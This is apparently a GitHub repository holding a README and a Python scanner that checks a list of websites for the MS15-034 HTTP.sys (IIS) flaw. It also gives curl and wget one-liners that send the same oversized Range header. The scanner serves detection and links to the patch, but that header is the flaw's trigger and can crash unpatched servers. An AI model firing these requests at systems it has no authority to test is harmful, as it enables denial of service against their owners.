├── README.md └── http-sys.py /README.md: -------------------------------------------------------------------------------- 1 | This is a test POC for: 2 | MS15-034: HTTP.sys (IIS) DoS And Possible Remote Code Execution. 3 | By Ebrahim Hegazy @Zigoo0 4 | 5 | To start using the tool, just create list.txt file, and add all the sites you want to test to that file. 6 | And you are ready to go :) 7 | 8 | the tool is written in python, if you don't have python installed, you can download it from: python.org 9 | 10 | Once it's installed, Start the tool, enter list.txt and the tool will handle the rest :-) 11 | 12 | Features: 13 | 14 | 1- Can scan Multiple sites. 15 | 16 | 2- Supports SSL 17 | 18 | 3- Super User Friendly :D 19 | -------------------------------------------------------------------------------- /http-sys.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | import requests 3 | 4 | """ 5 | @Zigoo0 6 | Another testing methods. 7 | curl -v [ipaddress]/ -H "Host: test" -H "Range: bytes=0-18446744073709551615" 8 | wget -O /dev/null --header="Range: 0-18446744073709551615" http://[ip address]/ 9 | """ 10 | # Coloring class 11 | class colors: 12 | def __init__(self): 13 | self.green = "\033[92m" 14 | self.blue = "\033[94m" 15 | self.bold = "\033[1m" 16 | self.yellow = "\033[93m" 17 | self.red = "\033[91m" 18 | self.end = "\033[0m" 19 | color = colors() 20 | 21 | banner = color.green+''' 22 | This is a test POC for: 23 | MS15-034: HTTP.sys (IIS) DoS And Possible Remote Code Execution. 24 | By Ebrahim Hegazy @Zigoo0 \n'''+color.end 25 | 26 | print banner 27 | #Reading hosts from a text file to test multiple sites. 28 | hosts = open(raw_input('[*] Enter the name of the list file: ')).readlines() 29 | #Vulnerable hosts will go here. 30 | vulnerable = set() 31 | #Fixed hosts will go here. 32 | fixed = set() 33 | 34 | #Defining the main function. 
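# Hosts that could not be assessed (connection error, timeout, malformed URL).
# Kept apart from `fixed` so the summary does not overstate scan coverage.
untested = set()


def main(url):
    """Probe one URL for the MS15-034 (HTTP.sys) range-handling flaw.

    Sends a single GET carrying an oversized ``Range`` header and classifies
    the host from the reply: a 416 status or the text "Requested Range Not
    Satisfiable" records the URL in ``vulnerable``; any other reply records
    it in ``fixed``; a request that fails records it in ``untested``.

    Args:
        url: Full URL to test, scheme included (it is handed to
            ``requests.get`` unchanged).
    """
    print(color.green+"[*] Testing "+color.end + url)
    headers = {"User-Agent": "Mozilla/5.0 (Windows NT 6.2; rv:30.0) Gecko/20150101 Firefox/32.0",
               "Accept-Encoding": "gzip, deflate",
               "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
               "Range": "bytes=0-18446744073709551615",
               "Referer": "https://github.com/zigoo0/",
               "Connection": "keep-alive"
               }
    try:
        # verify=False lets the check run against hosts with self-signed or
        # mismatched certificates; the reply is therefore not authenticated
        # and should be treated as an indication, not proof.
        r = requests.get(url, headers=headers, verify=False, timeout=5)
        flagged = r.status_code == 416 or "Requested Range Not Satisfiable" in r.text
    except Exception as err:
        # Previously swallowed silently, which made unreachable or malformed
        # entries vanish from the results. Report them and keep scanning.
        print("[*] %s" % (url) + color.yellow + " could not be tested: %s\n" % (err) + color.end)
        untested.add(url)
        return

    # NOTE(review): this is a heuristic. Any server answering 416 is flagged,
    # IIS or not, and every other reply (403/404/5xx included) is counted as
    # not vulnerable. Confirm findings against the host's MS15-034 patch level.
    if flagged:
        print("[*] %s" % (url) + color.red+" is Vulnerable!\n"+color.end)
        # A set keeps each flagged host unique.
        vulnerable.add(url)
    else:
        print("[*] Seems %s " % (url) + color.green+" is not vulnerable!\n"+color.end)
        fixed.add(url)


if __name__ == "__main__":
    for host in hosts:
        url = host.strip()
        # Blank lines in the list file are not hosts; skip them.
        if not url:
            continue
        main(url)

    # Summary of flagged hosts.
    print(color.red+"[*] %s found to be vulnerable." % (len(vulnerable)) + color.end)
    if vulnerable:
        # Open the report once and close it deterministically; the original
        # reopened the file for every host and never closed the handles.
        with open('vulnerable-hosts.txt', 'a') as vulnz:
            for vuln in vulnerable:
                print("[-]  " + vuln)
                vulnz.write(vuln+"\n")
        print(color.blue+"[*] Vulnerable hosts added to "+color.end + "vulnerable-hosts.txt")

    # Hosts that answered without the 416 indicator.
    print(color.green+"\n[*] %s found to be NOT vulnerable." % (len(fixed)) + color.end)
    # Hosts with no verdict at all; without this line they would be invisible.
    if untested:
        print(color.yellow+"[*] %s could not be tested (see errors above)." % (len(untested)) + color.end)

    # References.
    print(color.green+"\n[*] Please follow below link for more details about this vulnerabability and How to FIX it."+color.end)
    print("[*] https://technet.microsoft.com/library/security/ms15-034")
    print("[*] https://technet.microsoft.com/en-us/library/security/ms15-apr.aspx")
    print(color.green+"[*] Don't forget to update your servers.\n"+color.end)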